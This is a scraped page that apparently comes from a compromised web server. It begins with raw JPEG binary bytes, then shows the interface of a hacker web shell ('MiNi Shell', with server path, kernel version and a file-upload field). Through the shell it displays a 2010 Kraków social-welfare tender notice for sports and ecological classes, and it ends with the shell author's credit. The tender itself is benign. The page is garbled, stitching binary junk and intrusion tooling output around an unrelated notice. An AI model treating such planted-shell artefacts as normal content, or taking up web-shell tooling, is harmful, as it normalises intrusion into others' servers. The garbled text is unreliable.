JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100831/235631-N-2010.html

<p class="kh_header"><b>Kraków: organizacja zajęć sportowych oraz zajęć edukacyjnych dla uczestników projektu Pora na aktywność</b><br>
<b>Numer ogłoszenia: 235631 - 2010; data zamieszczenia: 31.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja zajęć sportowych oraz zajęć edukacyjnych dla uczestników projektu Pora na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  organizacja zajęć sportowych oraz zajęć z edukacji ekologicznej dla uczestników projektu Pora na aktywność zgodnie  z poniższymi wytycznymi:
I część zamówienia - organizacja zajęć o charakterze sportowym dla uczestników projektu Pora na aktywność: PAL Stworzyć miejsce do życia
1)	ilość uczestników: 8 w wieku 16-26 lat /w tym 4 niepełnoletnich/
2)	termin realizacji: od dnia podpisania umowy do 31.11.2010
3)	Wykonawca zorganizuje i przeprowadzi zajęcia na  terenie Krakowa.   Program zajęć dla 1 osoby:
a)	2 lekcje jazdy konnej w stadninie koni dla początkujących (2 lekcja - 2 godziny zegarowe)
b)	2 wyjścia na basen (1 wejście - 90 minut)
c)	2 wizyty na ściance wspinaczkowej ( 1 wejście - 2 godziny)
d)	1 wyjście na grę w kręgle (1 godzina zegarowa gry)
e)	I grupa - 2 lekcje sportów walki Kung Fu Wing Chun (1 wejście - 90 minut)
II grupa - 2 wyjścia do parku wodnego (1 wejście - 2 godziny zegarowe) i 1 wyjście na gokart w Parku Wodnym (1 godzina zegarowa)
4)	Zajęcia odbywać się będą w soboty, niedziele i święta ustawowo wolne od pracy, bądź w dzień powszedni po godz.16.00,
5)	Wykonawca zapewni opiekę nad uczestnikami podczas zajęć
6)	Zajęcia będą urozmaicone i zorganizowane w atrakcyjnej dla młodzieży formie, 
7)	Wykonawca zapewnia ubezpieczenie uczestników NNW na kwotę min.5000zł/os
8)	Wyjścia będą się odbywać w grupach 4-osobowych
9)	Wykonawca świadczy usługę na podstawie harmonogramu przekazanego przez Zamawiającego do 5 dni przed rozpoczęciem zajęć. Harmonogram może być modyfikowany w trakcie trwania usługi w związku z niemożliwymi do przewidzenia okolicznościami ze strony uczestników projektu lub Zamawiającego.
10)	W przypadku o którym mowa w pkt 3 lit e - a wyboru zajęć dokonają beneficjenci,  Wykonawca zostanie poinformowany o ich wyborze do 5 dni roboczych przed rozpoczęciem zajęć.
11)	Uczestnicy niepełnoletni będą odbierani od rodziców przez Wykonawcę i odprowadzani do domu po zajęciach wg harmonogramu o którym mowa w pkt 9
12)	Usługa obejmuje beneficjentów zamieszkałych na terenie  Dzielnicy XIII  Miasta Krakowa
13)	Czas dojazdu nie jest wliczany w czas trwania zajęć
14)	Bilety na transport MPK dla beneficjentów projektu zapewnia Zamawiający
15)	Wykonawca każdorazowo najpóźniej na dzień przed świadczeniem usługi przekaże Zamawiającemu (telefonicznie/e-mailem) dane osobowe opiekuna/opiekunki (imię, nazwisko, numer telefonu komórkowego i serię i numer dowodu osobistego lub numer legitymacji służbowej lub dane innego dokumentu ze zdjęciem umożliwiającego weryfikację tożsamości), 
16)	Wykonawca zobowiązany jest do prowadzenia listy obecności uczestników zajęć.

II część zamówienia - prowadzenie zajęć rekreacyjno-sportowych dla uczestników projektu Pora na aktywność - PAL Prądnik Czerwony
1)	Prowadzenie zajęć rekreacyjno-sportowych z elementami gry w koszykówkę dla młodzieży w wieku  15-24
a)	termin realizacji:  01.10.2010-31.12.2010
b)	ilość godzin: 44, tj. 22 spotkania po 2 godziny zegarowe
c)	ilość uczestników: 20-40 /w dwóch grupach liczących każda 10-20 osób/
d)	miejsce realizacji: Szkoła Podstawowa nr 2 im. Św. Wojciecha w Krakowie przy ul. Strzelców 5a /lokal zapewnia Zamawiający/
e)	zajęcia odbywać się będą dwa razy w tygodniu po 2 godziny, między poniedziałkiem a piątkiem,  w godz. 17.00-19.00 /każda grupa raz w  tygodniu/
f)	zajęcia winny zawierać elementy rozwijające u uczestników sprawność moto-funkcjonalną, kondycyjną i koordynacyjną
g)	Wykonawca do 7 dni przed rozpoczęciem zajęć zobowiązany jest do przedłożenia animatorowi lokalnemu wskazanemu przez Zamawiającego, do akceptacji, programu zajęć,
h)	sprzęt sportowy do prowadzenia zajęć zapewnia Zamawiający
2)	Prowadzenie aerobiku dla kobiet 
a)	termin realizacji: 24.10.2010-30.11.2010
b)	ilość godzin:  20 tj. 10 spotkań po 2 godziny zegarowe
c)	ilość uczestników: 5-10
d)	Miejsce realizacji: lokal Zamawiającego w Krakowie przy ul. Dobrego Pasterza 72
e)	Zajęcia odbywać się będą dwa razy w tygodniu po 2 godziny między poniedziałkiem a piątkiem w godz.17.00-19.00
f)	Materace do ćwiczeń zapewnia Zamawiający, inne elementy niezbędne do prowadzenia zajęć zapewnia Wykonawca.
3)	 Wykonawca zapewnia ubezpieczenie uczestników NNW na kwotę min.5000zł/os
4)	Szczegółowy harmonogram zajęć zostanie przekazany przez Zamawiającego do 7 dni przed rozpoczęciem realizacji usługi.
5)	Wykonanie harmonogramu zostanie potwierdzone przez Animatora lokalnego wskazanego przez Zamawiającego
6)	Wykonawca zobowiązany jest do prowadzenia listy obecności uczestników zajęć.
7)	Zajęcia o których mowa w ust 1 część II pkt 1 i 2 nie będą realizowane w tym samym czasie

III część zamówienia - prowadzenie zajęć z edukacji ekologicznej w ramach projektu Pora na aktywność: PAL Grzegórzki
1)	Organizacja i prowadzenie zajęć ekologicznych w formie interaktywnej, w tym:
a)	zabawy edukacyjne z udziałem rodziców/rodzica i dzieci/dziecka
- zabawy dla dzieci w wieku przedszkolnym (3-6 lat)
- zabawy dla dzieci w wieku szkolnym (7-14)
b)	zabawy z wykorzystaniem materiałów wtórnych (gazet butelek plastikowych itp./
c)	krótka informacja dotycząca ekologii na co dzień /w tym segregacja odpadów/
2)	Ilość uczestników: nie mniej niż 60, w tym 30 dzieci w wieku 3-14 lat w ciągu 3 lat / nie mniej niż 20 rocznie - w tym 10 dzieci w wieku 3-14 lat/
3)	Termin realizacji: 
a)	I zajęcia - 25 wrzesień 2010 w godz.  11.30 do 14.30 /3 godziny zegarowe/
b)	II zajęcia - wrzesień 2011 /3 godziny zegarowe/
c)	III zajęcia - wrzesień 2012 /3 godziny zegarowe/
4)	Termin realizacji zajęć o których mowa w części III pkt 3 lit b i c zostanie wskazany przez Zamawiającego do 30 dni przed rozpoczęciem zajęć.
5)	Miejsce realizacji: w miejscu wskazanym przez Zamawiającego w Krakowie przy ul. Semperitowców 13. /Zajęcia odbędą się w trakcie pikniku/
6)	Wykonawca do 7 dni przed rozpoczęciem zajęć zobowiązany jest do przedłożenia animatorowi lokalnemu wskazanemu przez Zamawiającego, do akceptacji, konspektu zajęć.
2.	Warunki płatności: 
1) w przypadku części I
a)	okres rozliczeniowy ustala się na miesiąc kalendarzowy.
b)	wynagrodzenie płatne będzie po zakończeniu każdego okresu rozliczeniowego przelewem na rachunek bankowy Wykonawcy w ciągu 14 dni od daty przyjęcia faktury/rachunku częściowego przez Zamawiającego.
c)	Wykonawca załączy do rachunku/faktury wykaz faktycznie wykonanych prac w ramach usługi wg wzoru stanowiącego załącznik nr 1 do siwz oraz listę obecności.
2) w przypadku części II
a)	okres rozliczeniowy ustala się na miesiąc kalendarzowy 
b)	rachunek/faktura wraz z załączoną listą obecności zastaną potwierdzone przez kierownika wskazanego przez Zamawiającego
c)	wynagrodzenie płatne będzie po zakończeniu każdego okresu rozliczeniowego przelewem na rachunek bankowy Wykonawcy w ciągu 14 dni od daty przyjęcia potwierdzonej faktury/rachunku  częściowego przez Zamawiającego.
3) w przypadku części III
a) wynagrodzenie płatne po zrealizowaniu każdych zajęć przelewem na rachunek bankowy Wykonawcy w ciągu 14 dni od daty przyjęcia faktury/rachunku częściowego przez Zamawiającego
3.	Warunki dodatkowe: 
1)	Wykonawca każdorazowo informuje Zamawiającego (e-mail, telefon) o trudnościach/ problemach związanych z realizacją usługi, zwłaszcza zachowaniem beneficjentów podczas usługi, stanem lub zachowaniem rodziców/ opiekunów/ osób trzecich w związku z wykonywaną usługą.
2)	Jeżeli wykonawca stwierdzi zagrożenie zdrowia lub życia beneficjenta niezwłocznie poinformuje o tym Zamawiającego  - (e-mail, telefon) 
3)	W przypadku sytuacji określonych w pkt.1-2 kontaktować należy się z Sekcją ds. Zarządzania Projektami tel. 12-257-00-79, e-mail sp@mops.krakow.pl 
4)	Zamawiający, a także podmiot kontrolujący Zamawiającego może w każdej chwili skontrolować Wykonawcę w zakresie świadczonej przez niego usługi.
5)	Wykonawca informuje uczestników zajęć o współfinansowaniu usługi przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
6)	Wykonawca dostarczy polisę ubezpieczeniową potwierdzającą wykonanie warunku ubezpieczenia dzieci od NNW przed podjęciem opieki/rozpoczęciem zajęć.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	w przypadku I części zamówienia: 
a)	prowadzi działalność gospodarczą polegającą na organizacji zajęć dla dzieci stanowiących przedmiot zamówienia
2)	w przypadku II części zamówienia - osoba uczestnicząca w realizacji zadania:
a)	ukończyła studia wyższe magisterskie na kierunku: wychowanie fizyczne; sport, turystyka i rekreacja; fizjoterapia
b)	w okresie ostatnich trzech lat wykonała minimum.30 godzin w prowadzeniu zajęć rekreacyjno - sportowych z zakresu koszykówki
c)	posiada tytuł instruktora aerobicu,
d)	posiada uprawnienia do prowadzenia gimnastyki korekcyjnej, zajęć gry w koszykówkę
3)	w przypadku III części zamówienia, osoba uczestnicząca w realizacji zadania:
a)	posiada wykształcenie wyższe
b)	ukończyła szkołę animatora-wychowawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty pośwaidczające wykształcenie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności, podwykonawcy oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS kraków ul.Jżóefińska 14 pok 001.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2010 godzina 10:00, miejsce: Dziennik Podawczy MOPS ul.Józefińska 14 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PORA NA AKTYWNOŚĆ 
Kryterium oceny w przypadku części II
Cena = 10 %
Wykształcenie = 20%
Doświadczenie = 40%
Dodatkowe uprawnienia = 30%.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com